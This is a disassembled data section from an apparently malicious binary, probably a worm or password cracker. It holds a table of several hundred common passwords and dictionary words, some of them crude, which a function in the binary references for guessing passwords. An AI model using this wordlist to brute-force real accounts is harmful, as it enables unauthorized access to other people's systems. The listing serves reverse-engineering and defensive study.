dd offset aPeter ; "peter"
dd offset aPhil ; "phil"
dd offset aPhilip ; "philip"
dd offset aPhoenix ; "phoenix"
dd offset aPhone ; "phone"
dd offset aPhoton ; "photon"
dd offset aPhrack ; "phrack"
dd offset aPhrase ; "phrase"
dd offset aPhreak ; "phreak"
dd offset aPhuck ; "phuck"
dd offset aPick ; "pick"
dd offset aPierre ; "pierre"
dd offset aPimp ; "pimp"
dd offset aPinname ; "pinname"
dd offset aPiss ; "piss"
dd offset aPizza ; "pizza"
dd offset aPlane ; "plane"
dd offset aPlayboy ; "playboy"
dd offset aPlover ; "plover"
dd offset aPluto ; "pluto"
dd offset aPlymouth ; "plymouth"
dd offset aPoetry ; "poetry"
dd offset aPolice ; "police"
dd offset aPolly ; "polly"
dd offset aPolynomi ; "polynomi"
dd offset aPonderin ; "ponderin"
dd offset aPoop ; "poop"
dd offset aPoor ; "poor"
dd offset aPork ; "pork"
dd offset aPorn ; "porn"
dd offset aPorno ; "porno"
dd offset aPorsche ; "porsche"
dd offset aPost ; "post"
dd offset aPoster ; "poster"
dd offset aPower ; "power"
dd offset aPraise ; "praise"
dd offset aPrecious ; "precious"
dd offset aPrelude ; "prelude"
dd offset aPresto ; "presto"
dd offset aPrince ; "prince"
dd offset aPrinceto ; "princeto"
dd offset aPrinter ; "printer"
dd offset aPriv ; "priv"
dd offset aPrivate ; "private"
dd offset aPrivs ; "privs"
dd offset aProceed ; "proceed"
dd offset aProcesso ; "processo"
dd offset aProfesso ; "professo"
dd offset aProfile ; "profile"
dd offset aProgram ; "program"
dd offset aPrompt ; "prompt"
dd offset aProtect ; "protect"
dd offset aProtozoa ; "protozoa"
dd offset aPsycho ; "psycho"
dd offset aPsychopa ; "psychopa"
dd offset aPublic ; "public"
dd offset aPuck ; "puck"
dd offset aPuke ; "puke"
dd offset aPumpkin ; "pumpkin"
dd offset aPuneet ; "puneet"
dd offset aPunisher ; "punisher"
dd offset aPunk ; "punk"
dd offset aPuppet ; "puppet"
dd offset aPussy ; "pussy"
dd offset aQuebec ; "quebec"
dd offset aQwert ; "qwert"
dd offset aQwerty ; "qwerty"
dd offset aRabbit ; "rabbit"
dd offset aRachel ; "rachel"
dd offset aRachelle ; "rachelle"
dd offset aRachmani ; "rachmani"
dd offset aRaid ; "raid"
dd offset aRain ; "rain"
dd offset aRainbow ; "rainbow"
dd offset aRaindrop ; "raindrop"
dd offset aRaleigh ; "raleigh"
dd offset aRandom ; "random"
dd offset aRape ; "rape"
dd offset aRascal ; "rascal"
dd offset aRazor ; "razor"
dd offset aReagan ; "reagan"
dd offset aReality ; "reality"
dd offset aReally ; "really"
dd offset aReam ; "ream"
dd offset aReaper ; "reaper"
dd offset aRebal ; "rebal"
dd offset aRebecca ; "rebecca"
dd offset aRebel ; "rebel"
dd offset aRecord ; "record"
dd offset aReddawn ; "reddawn"
dd offset aRedhead ; "redhead"
dd offset aReferenc ; "referenc"
dd offset aRegional ; "regional"
dd offset aRelease ; "release"
dd offset aRemote ; "remote"
dd offset aRenee ; "renee"
dd offset aReno ; "reno"
dd offset aRent ; "rent"
dd offset aReport ; "report"
dd offset aRepublic ; "republic"
dd offset aResistan ; "resistan"
dd offset aReveal ; "reveal"
dd offset aRhino ; "rhino"
dd offset aRich ; "rich"
dd offset aRick ; "rick"
dd offset aRiffraff ; "riffraff"
dd offset aRight ; "right"
dd offset aRightwin ; "rightwin"
dd offset aRing ; "ring"
dd offset aRiot ; "riot"
dd offset aRipple ; "ripple"
dd offset aRisc ; "risc"
dd offset aRoach ; "roach"
dd offset aRobert ; "robert"
dd offset aRobin ; "robin"
dd offset aRobot ; "robot"
dd offset aRobotics ; "robotics"
dd offset aRobyn ; "robyn"
dd offset aRochelle ; "rochelle"
dd offset aRocheste ; "rocheste"
dd offset aRock ; "rock"
dd offset aRocky ; "rocky"
dd offset aRockyhor ; "rockyhor"
dd offset aRodent ; "rodent"
dd offset aRolex ; "rolex"
dd offset aRomano ; "romano"
dd offset aRomeo ; "romeo"
dd offset aRomulan ; "romulan"
dd offset aRonald ; "ronald"
dd offset aRose ; "rose"
dd offset aRosebud ; "rosebud"
dd offset aRosemary ; "rosemary"
dd offset aRoses ; "roses"
dd offset aRough ; "rough"
dd offset aRubber ; "rubber"
dd offset aRuben ; "ruben"
dd offset aRuby ; "ruby"
dd offset aRude ; "rude"
dd offset aRules ; "rules"
dd offset aRunning_0 ; "running"
dd offset aRush ; "rush"
dd offset aRuth ; "ruth"
dd offset aSafe ; "safe"
dd offset aSalami ; "salami"
dd offset aSale ; "sale"
dd offset aSalt ; "salt"
dd offset aSamantha ; "samantha"
dd offset aSample ; "sample"
dd offset aSandra ; "sandra"
dd offset aSandy ; "sandy"
dd offset aSara ; "sara"
dd offset aSarah ; "sarah"
dd offset aSaturday ; "saturday"
dd offset aSaturn ; "saturn"
dd offset aSaxon ; "saxon"
dd offset aScamper ; "scamper"
dd offset aScheme ; "scheme"
dd offset aSchool ; "school"
dd offset aSchoolsucks ; "schoolsucks"
dd offset aScifi ; "scifi"
dd offset aScorpion ; "scorpion"
dd offset aScott ; "scott"
dd offset aScotty ; "scotty"
dd offset aScout ; "scout"
dd offset aSearch ; "search"
dd offset aSecurity ; "security"
dd offset aSeed ; "seed"
dd offset aSega ; "sega"
dd offset aSensor ; "sensor"
dd offset aSentinel ; "sentinel"
dd offset aSentry ; "sentry"
dd offset aSerenity ; "serenity"
dd offset aSerial_0 ; "serial"
dd offset aService ; "service"
dd offset aSesame ; "sesame"
dd offset aSexy ; "sexy"
dd offset aShannon ; "shannon"
dd offset aSharc ; "sharc"
dd offset aShark ; "shark"
dd offset aSharks ; "sharks"
dd offset aSharon ; "sharon"
dd offset aSheffiel ; "sheffiel"
dd offset aSheldon ; "sheldon"
dd offset aShell ; "shell"
dd offset aSherri ; "sherri"
dd offset aShift ; "shift"
dd offset aShirley ; "shirley"
dd offset aShit ; "shit"
dd offset aShitpot ; "shitpot"
dd offset aShiva ; "shiva"
dd offset aShivers ; "shivers"
dd offset aShort ; "short"
dd offset aShuttle ; "shuttle"
dd offset aSick ; "sick"
dd offset aSierra ; "sierra"
dd offset aSignatur ; "signatur"
dd offset aSilver ; "silver"
dd offset aSimcity ; "simcity"
dd offset aSimon ; "simon"
dd offset aSimple ; "simple"
dd offset aSimpsons ; "simpsons"
dd offset aSimulati ; "simulati"
dd offset aSinger ; "singer"
dd offset aSingle ; "single"
dd offset aSite ; "site"
dd offset aSkull ; "skull"
dd offset aSlave ; "slave"
dd offset aSlick ; "slick"
dd offset aSliders ; "sliders"
dd offset aSlow ; "slow"
dd offset aSlut ; "slut"
dd offset aSmall ; "small"
dd offset aSmart ; "smart"
dd offset aSmile ; "smile"
dd offset aSmiles ; "smiles"
dd offset aSmooch ; "smooch"
dd offset aSmother ; "smother"
dd offset aSmtp ; "smtp"
dd offset aSmut ; "smut"
dd offset aSnach ; "snach"
dd offset aSnafu ; "snafu"
dd offset aSnake ; "snake"
dd offset aSnatch ; "snatch"
dd offset aSnoopy ; "snoopy"
dd offset aSoap ; "soap"
dd offset aSocial ; "social"
dd offset aSocrates ; "socrates"
dd offset aSodomy ; "sodomy"
dd offset aSoft ; "soft"
dd offset aSoftware ; "software"
dd offset aSomebody ; "somebody"
dd offset aSondra ; "sondra"
dd offset aSonia ; "sonia"
dd offset aSonic ; "sonic"
dd offset aSonya ; "sonya"
dd offset aSossina ; "sossina"
dd offset aSource ; "source"
dd offset aSouth ; "south"
dd offset aSpaceshi ; "spaceshi"
dd offset aSparrows ; "sparrows"
dd offset aSpear ; "spear"
dd offset aSpell ; "spell"
dd offset aSpice ; "spice"
dd offset aSpider ; "spider"
dd offset aSpiderma ; "spiderma"
dd offset aSpit ; "spit"
dd offset aSpred ; "spred"
dd offset aSpring ; "spring"
dd offset aSpringer ; "springer"
dd offset aSpunk ; "spunk"
dd offset aSquires ; "squires"
dd offset aSr71 ; "sr71"
dd offset aStacey ; "stacey"
dd offset aStaci ; "staci"
dd offset aStacie ; "stacie"
dd offset aStacy ; "stacy"
dd offset aStar ; "star"
dd offset aStarship ; "starship"
dd offset aStart ; "start"
dd offset aStartrek ; "startrek"
dd offset aStartup ; "startup"
dd offset aStarwars ; "starwars"
dd offset aSteak ; "steak"
dd offset aSteal ; "steal"
dd offset aSteel ; "steel"
dd offset aSteph ; "steph"
dd offset aStephani ; "stephani"
dd offset aStereo ; "stereo"
dd offset aSteve ; "steve"
dd offset aStoneage ; "stoneage"
dd offset aStoned ; "stoned"
dd offset aStones ; "stones"
dd offset aStrange ; "strange"
dd offset aStrangle ; "strangle"
dd offset aStratfor ; "stratfor"
dd offset aStreetfi ; "streetfi"
dd offset aString ; "string"
dd offset aStrip ; "strip"
dd offset aStudent ; "student"
dd offset aStuttgar ; "stuttgar"
dd offset aSubscrib ; "subscrib"
dd offset aSubway ; "subway"
dd offset aSuccess ; "success"
dd offset aSuck ; "suck"
dd offset aSuckmydi ; "suckmydi"
dd offset aSucks ; "sucks"
dd offset aSummer ; "summer"
dd offset aSunday ; "sunday"
dd offset aSuperman ; "superman"
dd offset aSuperson ; "superson"
dd offset aSupersta ; "supersta"
dd offset aSuperuse ; "superuse"
dd offset aSupervis ; "supervis"
dd offset aSupport ; "support"
dd offset aSupporte ; "supporte"
dd offset aSurfer ; "surfer"
dd offset aSurfing ; "surfing"
dd offset aSusan ; "susan"
dd offset aSusanne ; "susanne"
dd offset aSusie ; "susie"
dd offset aSuzanne ; "suzanne"
dd offset aSuzie ; "suzie"
dd offset aSwearer ; "swearer"
dd offset aSweat ; "sweat"
dd offset aSwitch ; "switch"
dd offset aSword ; "sword"
dd offset aSybil ; "sybil"
dd offset aSymmetry ; "symmetry"
dd offset aSysadmin ; "sysadmin"
dd offset aSysop ; "sysop"
dd offset aTabasco ; "tabasco"
dd offset aTalk ; "talk"
dd offset aTall ; "tall"
dd offset aTamara ; "tamara"
dd offset aTami ; "tami"
dd offset aTamie ; "tamie"
dd offset aTammy ; "tammy"
dd offset aTangerin ; "tangerin"
dd offset aTango ; "tango"
dd offset aTape ; "tape"
dd offset aTara ; "tara"
dd offset aTarget ; "target"
dd offset aTarragon ; "tarragon"
dd offset aTaylor ; "taylor"
dd offset aTeacher ; "teacher"
dd offset aTeam ; "team"
dd offset aTeapot ; "teapot"
dd offset aTears ; "tears"
dd offset aTech ; "tech"
dd offset aTeen ; "teen"
dd offset aTeenage ; "teenage"
dd offset aTelephon ; "telephon"
dd offset aTelnet ; "telnet"
dd offset aTemptati ; "temptati"
dd offset aTennis ; "tennis"
dd offset aTera ; "tera"
dd offset aTerminal ; "terminal"
dd offset aTerminat ; "terminat"
dd offset aTess ; "tess"
dd offset aTetris ; "tetris"
dd offset aText ; "text"
dd offset aThailand ; "thailand"
dd offset aTheresa ; "theresa"
dd offset aThin ; "thin"
dd offset aThursday ; "thursday"
dd offset aTiffany ; "tiffany"
dd offset aTiger ; "tiger"
dd offset aTime ; "time"
dd offset aTina ; "tina"
dd offset aTits ; "tits"
dd offset aToad ; "toad"
dd offset aToggle ; "toggle"
dd offset aToken ; "token"
dd offset aTokenrin ; "tokenrin"
dd offset aTomato ; "tomato"
dd offset aTopograp ; "topograp"
dd offset aTortoise ; "tortoise"
dd offset aToxic ; "toxic"
dd offset aToyota ; "toyota"
dd offset aTraci ; "traci"
dd offset aTracie ; "tracie"
dd offset aTracy ; "tracy"
dd offset aTrails ; "trails"
dd offset aTransfer ; "transfer"
dd offset aTrap ; "trap"
dd offset aTrapdoor ; "trapdoor"
dd offset aTree ; "tree"
dd offset aTrek ; "trek"
dd offset aTrisha ; "trisha"
dd offset aTrivial ; "trivial"
dd offset aTrojan ; "trojan"
dd offset aTrombone ; "trombone"
dd offset aTron ; "tron"
dd offset aTrue ; "true"
dd offset aTruth ; "truth"
dd offset aTubas ; "tubas"
dd offset aTuesday ; "tuesday"
dd offset aTurn ; "turn"
dd offset aTuttle ; "tuttle"
dd offset aUgly ; "ugly"
dd offset aUmesh ; "umesh"
dd offset aUncle ; "uncle"
dd offset aUndo ; "undo"
dd offset aUnhappy ; "unhappy"
dd offset aUnicorn ; "unicorn"
dd offset aUniform ; "uniform"
dd offset aUniversa ; "universa"
dd offset aUniverse ; "universe"
dd offset aUniversi ; "universi"
dd offset aUnknown_1 ; "unknown"
dd offset aUnlock ; "unlock"
dd offset aUpload ; "upload"
dd offset aUranus ; "uranus"
dd offset aUrchin ; "urchin"
dd offset aUrsula ; "ursula"
dd offset aUsenet ; "usenet"
dd offset aUsermane ; "usermane"
dd offset aUsername ; "username"
dd offset aUsmc ; "usmc"
dd offset aUtil ; "util"
dd offset aUtility ; "utility"
dd offset aUucp ; "uucp"
dd offset aVagina ; "vagina"
dd offset aValerie ; "valerie"
dd offset aVampire ; "vampire"
dd offset aVasant ; "vasant"
dd offset aVenus ; "venus"
dd offset aVeronica ; "veronica"
dd offset aVertigo ; "vertigo"
dd offset aVicky ; "vicky"
dd offset aVictor ; "victor"
dd offset aVideo ; "video"
dd offset aVideogam ; "videogam"
dd offset aVillage ; "village"
dd offset aVirgin ; "virgin"
dd offset aVirginia ; "virginia"
dd offset aVirus ; "virus"
dd offset aVisitor ; "visitor"
dd offset aVisual ; "visual"
dd offset aVisualba ; "visualba"
dd offset aVodka ; "vodka"
dd offset aWaco ; "waco"
dd offset aWard ; "ward"
dd offset aWarez ; "warez"
dd offset aWarfare ; "warfare"
dd offset aWargames ; "wargames"
dd offset aWarp ; "warp"
dd offset aWarren ; "warren"
dd offset aWasp ; "wasp"
dd offset aWatchwor ; "watchwor"
dd offset aWater ; "water"
dd offset aWave ; "wave"
dd offset aWebpage ; "webpage"
dd offset aWednesda ; "wednesda"
dd offset aWeed ; "weed"
dd offset aWeenie ; "weenie"
dd offset aWell ; "well"
dd offset aWendi ; "wendi"
dd offset aWendy ; "wendy"
dd offset aWerewolf ; "werewolf"
dd offset aWest ; "west"
dd offset aWestern ; "western"
dd offset aWhatever ; "whatever"
dd offset aWhatnot ; "whatnot"
dd offset aWhisky ; "whisky"
dd offset aWhite ; "white"
dd offset aWhiting ; "whiting"
dd offset aWhitney ; "whitney"
dd offset aWholesal ; "wholesal"
dd offset aWhore ; "whore"
dd offset aWill ; "will"
dd offset aWilliam ; "william"
dd offset aWilliams ; "williams"
dd offset aWillie ; "willie"
dd offset aWilma ; "wilma"
dd offset aWindows ; "windows"
dd offset aWine ; "wine"
dd offset aWing ; "wing"
dd offset aWinston ; "winston"
dd offset aWired ; "wired"
dd offset aWisconsi ; "wisconsi"
dd offset aWiseass ; "wiseass"
dd offset aWithin ; "within"
dd offset aWizard ; "wizard"
dd offset aWolf ; "wolf"
dd offset aWolverin ; "wolverin"
dd offset aWoman ; "woman"
dd offset aWombat ; "wombat"
dd offset aWomen ; "women"
dd offset aWood ; "wood"
dd offset aWoodwind ; "woodwind"
dd offset aWord ; "word"
dd offset aWordperf ; "wordperf"
dd offset aWorf ; "worf"
dd offset aWork ; "work"
dd offset aWorm ; "worm"
dd offset aWormwood ; "wormwood"
dd offset aWwii ; "wwii"
dd offset aWyoming ; "wyoming"
dd offset aXena ; "xena"
dd offset aXfer ; "xfer"
dd offset aXman ; "xman"
dd offset aXmen ; "xmen"
dd offset aXmodem ; "xmodem"
dd offset aXray ; "xray"
dd offset aXyzzy ; "xyzzy"
dd offset aYaco ; "yaco"
dd offset aYang ; "yang"
dd offset aYankee ; "yankee"
dd offset aYellow ; "yellow"
dd offset aYellowst ; "yellowst"
dd offset aYolanda ; "yolanda"
dd offset aYosemite ; "yosemite"
dd offset aYoung ; "young"
dd offset aZebra ; "zebra"
dd offset aZeitgeis ; "zeitgeis"
dd offset aZiggy ; "ziggy"
dd offset aZimmerma ; "zimmerma"
dd offset aZmodem ; "zmodem"
dd offset aZombie ; "zombie"
dd offset aZulu ; "zulu"
dd offset a00000000 ; "00000000"
dd offset aTester ; "tester"
dd offset aTestin ; "testin"
dd offset aRoss ; "Ross"
dd offset aRosco ; "Rosco"
dd offset aRoscop ; "RoscoP"
dd offset aRoscopcoltrane ; "RoscoPColtrane"
dd offset aLol ; "lol"
dd offset aD00d ; "d00d"
dd offset aDudette ; "dudette"
dd offset aDud3 ; "dud3"
dd offset aAl3x ; "Al3x"
dd offset aAlexander ; "Alexander"
dd offset aDonaldduck ; "donaldduck"
dd offset aWileecoyote ; "wileecoyote"
dd offset aWindowz ; "windowz"
dd offset aWindoze ; "windoze"
dd offset aWindose ; "windose"
dd offset aBilly ; "billy"
dd offset aM ; "M$"
dd offset aMs ; "MS"
dd offset aWindowsxp ; "WindowsXP"
dd offset aWindows2k ; "windows2k"
dd offset aWindowsme ; "windowsME"
dd offset aWindows98 ; "windows98"
dd offset aWindows95 ; "windows95"
dd offset aWindozexp ; "windozexp"
dd offset aWindoze2k ; "windoze2k"
dd offset aWindozeme ; "windozeME"
dd offset aWindoze98 ; "windoze98"
dd offset aWindoze95 ; "windoze95"
dd offset aWh0r3 ; "wh0r3"
dd offset aHo ; "ho"
dd offset aWh0re ; "wh0re"
dd offset aHax ; "hax"
dd offset aHaxing ; "haxing"
dd offset aH4x1ng ; "h4x1ng"
dd offset aH4x0r1ng ; "h4x0r1ng"
dd offset aH4x0ring ; "h4x0ring"
dd offset aAda ; "ada"
dd offset aAlbatross ; "albatross"
dd offset aAlf ; "alf"
dd offset aAma ; "ama"
dd offset aAmorphous ; "amorphous"
dd offset aAmy ; "amy"
dd offset aAndromache ; "andromache"
dd offset aAnn ; "ann"
dd offset aAnthropogenic ; "anthropogenic"
dd offset aAsd ; "asd"
dd offset aAsm ; "asm"
dd offset aAtmosphere ; "atmosphere"
dd offset aBeethoven ; "beethoven"
dd offset aBicameral ; "bicameral"
dd offset aBob ; "bob"
dd offset aBsd ; "bsd"
dd offset aCad ; "cad"
dd offset aCampanile ; "campanile"
dd offset aCat ; "cat"
dd offset aCatherine ; "catherine"
dd offset aChemistry ; "chemistry"
dd offset aChristina ; "christina"
dd offset aChristine ; "christine"
dd offset aCommrades ; "commrades"
dd offset aCornelius ; "cornelius"
dd offset aDeb ; "deb"
dd offset aDesperate ; "desperate"
dd offset aDiscovery ; "discovery"
dd offset aDog ; "dog"
dd offset aDos ; "dos"
dd offset aEdinburgh ; "edinburgh"
dd offset aEiderdown ; "eiderdown"
dd offset aElizabeth ; "elizabeth"
dd offset aEnterprise ; "enterprise"
dd offset aEstablish ; "establish"
dd offset aExtension ; "extension"
dd offset aFoolproof ; "foolproof"
dd offset aForesight ; "foresight"
dd offset aFun ; "fun"
dd offset aGnu ; "gnu"
dd offset aHal ; "hal"
dd offset aHappening ; "happening"
dd offset aIbm ; "ibm"
dd offset aImbroglio ; "imbroglio"
dd offset aInnocuous ; "innocuous"
dd offset aJen ; "jen"
dd offset aJoy ; "joy"
dd offset aKey ; "key"
dd offset aKim ; "kim"
dd offset aLamination ; "lamination"
dd offset aLee ; "lee"
dd offset aLiz ; "liz"
dd offset aMacintosh ; "macintosh"
dd offset aMgr ; "mgr"
dd offset aMit ; "mit"
dd offset aNet ; "net"
dd offset aNew ; "new"
dd offset aNutrition ; "nutrition"
dd offset aOceanography ; "oceanography"
dd offset aPad ; "pad"
dd offset aPam ; "pam"
dd offset aPercolate ; "percolate"
dd offset aPersimmon ; "persimmon"
dd offset aPolynomial ; "polynomial"
dd offset aPondering ; "pondering"
dd offset aPrinceton ; "princeton"
dd offset aProfessor ; "professor"
dd offset aPub ; "pub"
dd offset aRachmaninoff ; "rachmaninoff"
dd offset aRje ; "rje"
dd offset aRochester ; "rochester"
dd offset aSal ; "sal"
dd offset aSheffield ; "sheffield"
dd offset aSignature ; "signature"
dd offset aStephanie ; "stephanie"
dd offset aStratford ; "stratford"
dd offset aStuttgart ; "stuttgart"
dd offset aSun ; "sun"
dd offset aSuperstage ; "superstage"
dd offset aSuperuser ; "superuser"
dd offset aSupported ; "supported"
dd offset aSys ; "sys"
dd offset aTangerine ; "tangerine"
dd offset aTelephone ; "telephone"
dd offset aTemptation ; "temptation"
dd offset aTopography ; "topography"
dd offset aTty ; "tty"
dd offset aWholesale ; "wholesale"
dd offset aWilliamsburg ; "williamsburg"
dd offset aWisconsin ; "wisconsin"
dd offset aXyz ; "xyz"
dd offset aYellowstone ; "yellowstone"
dd offset aZap ; "zap"
dd offset aZimmerman ; "zimmerman"
dd offset byte_43C63C
align 8
dword_430B28 dd 10h ; sub_40F6F1+B66�r ...
aZimmerman db 'zimmerman',0 ; DATA XREF: ___:00430B1C�o
align 4
aZap db 'zap',0 ; DATA XREF: ___:00430B18�o
aYellowstone db 'yellowstone',0 ; DATA XREF: ___:00430B14�o
aXyz db 'xyz',0 ; DATA XREF: ___:00430B10�o
aWisconsin db 'wisconsin',0 ; DATA XREF: ___:00430B0C�o
align 4
aWilliamsburg db 'williamsburg',0 ; DATA XREF: ___:00430B08�o
align 4
aWholesale db 'wholesale',0 ; DATA XREF: ___:00430B04�o
align 4
aTty db 'tty',0 ; DATA XREF: ___:00430B00�o
aTopography db 'topography',0 ; DATA XREF: ___:00430AFC�o
align 4
aTemptation db 'temptation',0 ; DATA XREF: ___:00430AF8�o
align 10h
aTelephone db 'telephone',0 ; DATA XREF: ___:00430AF4�o
align 4
aTangerine db 'tangerine',0 ; DATA XREF: ___:00430AF0�o
align 4
aSys db 'sys',0 ; DATA XREF: ___:00430AEC�o
aSupported db 'supported',0 ; DATA XREF: ___:00430AE8�o
align 4
aSuperuser db 'superuser',0 ; DATA XREF: ___:00430AE4�o
align 4
aSuperstage db 'superstage',0 ; DATA XREF: ___:00430AE0�o
align 10h
aSun db 'sun',0 ; DATA XREF: ___:00430ADC�o
aStuttgart db 'stuttgart',0 ; DATA XREF: ___:00430AD8�o
align 10h
aStratford db 'stratford',0 ; DATA XREF: ___:00430AD4�o
align 4
aStephanie db 'stephanie',0 ; DATA XREF: ___:00430AD0�o
align 4
aSignature db 'signature',0 ; DATA XREF: ___:00430ACC�o
align 4
aSheffield db 'sheffield',0 ; DATA XREF: ___:00430AC8�o
align 10h
aSal db 'sal',0 ; DATA XREF: ___:00430AC4�o
aRochester db 'rochester',0 ; DATA XREF: ___:00430AC0�o
align 10h
aRje db 'rje',0 ; DATA XREF: ___:00430ABC�o
aRachmaninoff db 'rachmaninoff',0 ; DATA XREF: ___:00430AB8�o
align 4
aPub db 'pub',0 ; DATA XREF: ___:00430AB4�o
aProfessor db 'professor',0 ; DATA XREF: ___:00430AB0�o
align 4
aPrinceton db 'princeton',0 ; DATA XREF: ___:00430AAC�o
align 10h
aPondering db 'pondering',0 ; DATA XREF: ___:00430AA8�o
align 4
aPolynomial db 'polynomial',0 ; DATA XREF: ___:00430AA4�o
align 4
aPersimmon db 'persimmon',0 ; DATA XREF: ___:00430AA0�o
align 4
aPercolate db 'percolate',0 ; DATA XREF: ___:00430A9C�o
align 10h
aPam db 'pam',0 ; DATA XREF: ___:00430A98�o
aPad db 'pad',0 ; DATA XREF: ___:00430A94�o
aOceanography db 'oceanography',0 ; DATA XREF: ___:00430A90�o
align 4
aNutrition db 'nutrition',0 ; DATA XREF: ___:00430A8C�o
align 4
aNew db 'new',0 ; DATA XREF: ___:00430A88�o
aNet db 'net',0 ; DATA XREF: ___:00430A84�o
aMit db 'mit',0 ; DATA XREF: ___:00430A80�o
aMgr db 'mgr',0 ; DATA XREF: ___:00430A7C�o
aMacintosh db 'macintosh',0 ; DATA XREF: ___:00430A78�o
align 10h
aLiz db 'liz',0 ; DATA XREF: ___:00430A74�o
aLee db 'lee',0 ; DATA XREF: ___:00430A70�o
aLamination db 'lamination',0 ; DATA XREF: ___:00430A6C�o
align 4
aKim db 'kim',0 ; DATA XREF: ___:00430A68�o
aJoy db 'joy',0 ; DATA XREF: ___:00430A60�o
aJen db 'jen',0 ; DATA XREF: ___:00430A5C�o
aInnocuous db 'innocuous',0 ; DATA XREF: ___:00430A58�o
align 4
aImbroglio db 'imbroglio',0 ; DATA XREF: ___:00430A54�o
align 4
aIbm db 'ibm',0 ; DATA XREF: ___:00430A50�o
aHappening db 'happening',0 ; DATA XREF: ___:00430A4C�o
align 4
aHal db 'hal',0 ; DATA XREF: ___:00430A48�o
aGnu db 'gnu',0 ; DATA XREF: ___:00430A44�o
aFun db 'fun',0 ; DATA XREF: ___:00430A40�o
aForesight db 'foresight',0 ; DATA XREF: ___:00430A3C�o
align 10h
aFoolproof db 'foolproof',0 ; DATA XREF: ___:00430A38�o
align 4
aExtension db 'extension',0 ; DATA XREF: ___:00430A34�o
align 4
aEstablish db 'establish',0 ; DATA XREF: ___:00430A30�o
align 4
aEnterprise db 'enterprise',0 ; DATA XREF: ___:00430A2C�o
align 10h
aElizabeth db 'elizabeth',0 ; DATA XREF: ___:00430A28�o
align 4
aEiderdown db 'eiderdown',0 ; DATA XREF: ___:00430A24�o
align 4
aEdinburgh db 'edinburgh',0 ; DATA XREF: ___:00430A20�o
align 4
aDos db 'dos',0 ; DATA XREF: ___:00430A1C�o
aDog db 'dog',0 ; DATA XREF: ___:00430A18�o
aDiscovery db 'discovery',0 ; DATA XREF: ___:00430A14�o
align 4
aDesperate db 'desperate',0 ; DATA XREF: ___:00430A10�o
align 4
aDeb db 'deb',0 ; DATA XREF: ___:00430A0C�o
aCornelius db 'cornelius',0 ; DATA XREF: ___:00430A08�o
align 4
aCommrades db 'commrades',0 ; DATA XREF: ___:00430A04�o
align 10h
aChristine db 'christine',0 ; DATA XREF: ___:00430A00�o
align 4
aChristina db 'christina',0 ; DATA XREF: ___:004309FC�o
align 4
aChemistry db 'chemistry',0 ; DATA XREF: ___:004309F8�o
align 4
aCatherine db 'catherine',0 ; DATA XREF: ___:004309F4�o
align 10h
aCat db 'cat',0 ; DATA XREF: ___:004309F0�o
aCampanile db 'campanile',0 ; DATA XREF: ___:004309EC�o
align 10h
aCad db 'cad',0 ; DATA XREF: ___:004309E8�o
aBsd db 'bsd',0 ; DATA XREF: ___:004309E4�o
aBob db 'bob',0 ; DATA XREF: ___:004309E0�o
aBicameral db 'bicameral',0 ; DATA XREF: ___:004309DC�o
align 4
aBeethoven db 'beethoven',0 ; DATA XREF: ___:004309D8�o
align 4
aAtmosphere db 'atmosphere',0 ; DATA XREF: ___:004309D4�o
align 10h
aAsm db 'asm',0 ; DATA XREF: ___:004309D0�o
aAsd db 'asd',0 ; DATA XREF: ___:004309CC�o
aAnthropogenic db 'anthropogenic',0 ; DATA XREF: ___:004309C8�o
align 4
aAnn db 'ann',0 ; DATA XREF: ___:004309C4�o
aAndromache db 'andromache',0 ; DATA XREF: ___:004309C0�o
align 4
aAmy db 'amy',0 ; DATA XREF: ___:004309BC�o
aAmorphous db 'amorphous',0 ; DATA XREF: ___:004309B8�o
align 4
aAma db 'ama',0 ; DATA XREF: ___:004309B4�o
aAlf db 'alf',0 ; DATA XREF: ___:004309B0�o
aAlbatross db 'albatross',0 ; DATA XREF: ___:004309AC�o
align 4
aAda db 'ada',0 ; DATA XREF: ___:004309A8�o
aH4x0ring db 'h4x0ring',0 ; DATA XREF: ___:004309A4�o
align 4
aH4x0r1ng db 'h4x0r1ng',0 ; DATA XREF: ___:004309A0�o
align 4
aH4x1ng db 'h4x1ng',0 ; DATA XREF: ___:0043099C�o
align 10h
aHaxing db 'haxing',0 ; DATA XREF: ___:00430998�o
align 4
aHax db 'hax',0 ; DATA XREF: ___:00430994�o
aWh0re db 'wh0re',0 ; DATA XREF: ___:00430990�o
align 4
aHo db 'ho',0 ; DATA XREF: ___:0043098C�o
align 4
aWh0r3 db 'wh0r3',0 ; DATA XREF: ___:00430988�o
align 10h
aWindoze95 db 'windoze95',0 ; DATA XREF: ___:00430984�o
align 4
aWindoze98 db 'windoze98',0 ; DATA XREF: ___:00430980�o
align 4
aWindozeme db 'windozeME',0 ; DATA XREF: ___:0043097C�o
align 4
aWindoze2k db 'windoze2k',0 ; DATA XREF: ___:00430978�o
align 10h
aWindozexp db 'windozexp',0 ; DATA XREF: ___:00430974�o
align 4
aWindows95 db 'windows95',0 ; DATA XREF: ___:00430970�o
align 4
aWindows98 db 'windows98',0 ; DATA XREF: ___:0043096C�o
align 4
aWindowsme db 'windowsME',0 ; DATA XREF: ___:00430968�o
align 10h
aWindows2k db 'windows2k',0 ; DATA XREF: ___:00430964�o
align 4
aWindowsxp db 'WindowsXP',0 ; DATA XREF: ___:00430960�o
align 4
aMs db 'MS',0 ; DATA XREF: ___:0043095C�o
align 4
aM db 'M$',0 ; DATA XREF: ___:00430958�o
align 10h
aBilly db 'billy',0 ; DATA XREF: ___:00430954�o
align 4
aWindose db 'windose',0 ; DATA XREF: ___:00430950�o
aWindoze db 'windoze',0 ; DATA XREF: ___:0043094C�o
aWindowz db 'windowz',0 ; DATA XREF: ___:00430948�o
aWileecoyote db 'wileecoyote',0 ; DATA XREF: ___:00430944�o
aDonaldduck db 'donaldduck',0 ; DATA XREF: ___:00430940�o
align 4
aAlexander db 'Alexander',0 ; DATA XREF: ___:0043093C�o
align 4
aAl3x db 'Al3x',0 ; DATA XREF: ___:00430938�o
align 4
aDud3 db 'dud3',0 ; DATA XREF: ___:00430934�o
align 4
aDudette db 'dudette',0 ; DATA XREF: ___:00430930�o
aD00d db 'd00d',0 ; DATA XREF: ___:0043092C�o
align 4
aLol db 'lol',0 ; DATA XREF: ___:00430928�o
aRoscopcoltrane db 'RoscoPColtrane',0 ; DATA XREF: ___:00430924�o
align 4
aRoscop db 'RoscoP',0 ; DATA XREF: ___:00430920�o
align 10h
aRosco db 'Rosco',0 ; DATA XREF: ___:0043091C�o
align 4
aRoss db 'Ross',0 ; DATA XREF: ___:00430918�o
align 10h
aTestin db 'testin',0 ; DATA XREF: ___:00430914�o
align 4
aTester db 'tester',0 ; DATA XREF: ___:00430910�o
align 10h
